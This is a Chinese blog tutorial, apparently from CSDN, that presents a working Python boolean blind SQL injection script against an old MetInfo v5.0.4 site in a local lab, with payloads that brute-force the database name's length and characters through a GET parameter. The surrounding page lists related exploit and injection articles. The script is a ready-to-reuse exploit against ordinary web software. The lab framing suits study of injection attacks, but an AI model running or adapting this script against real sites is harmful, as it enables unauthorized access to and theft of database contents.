构造exp-Python盲注脚本

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量447 收藏
点赞数 1
分类专栏: python安全开发 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/119651188
版权

0x00 搭建环境介绍

平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。

利用到metinfo老版本平台,平台中集合多种漏洞,本次实验实验python构造盲注exp,实现注入
环境介绍

手工注入测试:
存在注入

0x01 利用python构造exp-盲注脚本

import requests

def get_html(url):
    "我的功能判断页面内容是否包含关键字,来判断传递参数是否为条件成立"
    res = requests.get(url)
    if "88888888" in res.text:#返回特殊关键字
        return True
    else:
        return False


def get_databaseNL(url):
    "我的作用获取数据库名字长度"
    for num in range(1, 11):#判断数据库长度
        getinfo = " and length(database())=%s --+" % num#构造语句
        fullurl = url + getinfo#拼接完整的语句
        if get_html(fullurl):#如果页面返回值为真
            break#则停止
    return num#返回数据库长度


def get_databaseName(url,num):
    "我的作用是获取数据库名"
    dbname = ""
    for i in range(1,num+1):#构造循环
        for j in range(1,123):#ascii表字符
            getinfo = " and ascii(substr(database(),%s,1))=%s --+" %(i,j)
            fullurl = url+getinfo#拼接语句
            if get_html(fullurl):
                dbname += chr(j)
                #print(chr(j))
                break
    return dbname


if __name__ == "__main__":
    url = "http://192.168.2.4/metinfov504/metinfov504/about/show.php?lang=cn&id=22"#请求地址
    #headers = {
        #"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"}  # 第二步添加头部信息
    num = get_databaseNL(url)
     #params = {"id":"1' and length(database())=8 --+"}  #第三步添加参数信息
     #print(get_html())
    dbname = get_databaseName(url,num)
    print(dbname)

运行结果

告白热
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3229
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1594
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 250
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1304
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
【技术分享】手把手教你如何构造office漏洞EXP(第二期)
SAKAISON的博客
09-10 1043
作者:维一零 稿费:700RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 上一期本人分享了office经典漏洞CVE-2012-0158,演示了如何基于栈缓冲区溢出原理构造触发漏洞的攻击文档。本期分享的漏洞是CVE-2013-3906,也是一个典型的溢出型office文档漏洞。该漏洞的背景带有一定的传奇色彩,从技术框
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2342
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
exp-schp-201908301523-atr.pth
04-16
Self-Correction-Human-Parsing SCHP models exp-schp-201908301523-atr.pth
EXP-00091 Exporting questionable statistics
04-13
NULL 博文链接:https://xujq.iteye.com/blog/1714222
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
exp-strings-iitk:此实验属于Python编程实验室IITK。 全名:字符串
02-28
Python程式设计实验室 实验 弦乐 关于实验: 使用交互式模拟器教授Strings的基础知识。 最初,我们有一项任务将帮助用户回忆起他对字符串的知识,然后通过模拟器进行交互式表示,这将帮助用户增强他/她的概念。 ...
用于libmagic的python包装器-Python开发
05-25
此功能是exp python-magic python-magic是libmagic文件类型标识库的Python接口。 libmagic通过根据预定义的文件类型列表检查其文件头来识别文件类型。 Unix命令文件在命令行中公开了此功能。 用法>>>导入magic >>> ...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
office CVE-2017-11882 exp构造
weixin_30606461的博客
12-06 186
尝试了一下CVE-2017-11882的手动构造,过程有些小坑,遂记录一下。 如下图所示通过传入对象的方式向docx中插入一个equation的对象。 选择的对象为微软公式microsoft 3.0。 之后会弹出对应的对象工具,即导致该漏洞的核心组件equation.exe,在公式中写入一串字符,注意一定要写(后面会说到),保存退出。 使用解压工具解压,如下所示 ...
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 865
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
(转载)使用exp进行SQL报错注入
weixin_33890499的博客
05-19 276
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述 好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出...
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3163
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
imp和exp命令详解
热门推荐
BigZ的专栏
01-04 1万+
Export  和  Import 是一对读写 Oracle 数据的工具。Export  将  Oracle 数据库 中的数据输出到操作系统文件中,  Import  把这些文件中的数据读到Oracle  数据 库中。 1.        Export/Import          export分三种模式导出数据,分别为:表模式,用户模式,完全模式。下面对这三种模式进行详解: (1) 
exp常用语法
weixin_33806509的博客
11-15 891
将数据库内的各对象以二进制方式下载成dmp文件,方便数据迁移。buffer:下载数据缓冲区,以字节为单位,缺省依赖操作系统consistent:下载期间所涉及的数据保持read only,缺省为ndirect:使用直通方式 ,缺省为nfeeback:显示处理记录条数,缺省为0,即不显示file:输出文件,缺省为expdat.dmpfilesize:输出...
wrf-python计算假相当位温
04-29
wrf-python是一个专门为WRF(Weather Research and Forecasting Model)模型设计的Python工具包,提供了方便的数据处理和可视化功能。要计算假相当位温,需要使用wrf-python的计算函数和变量。 假相当位温是相当位...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值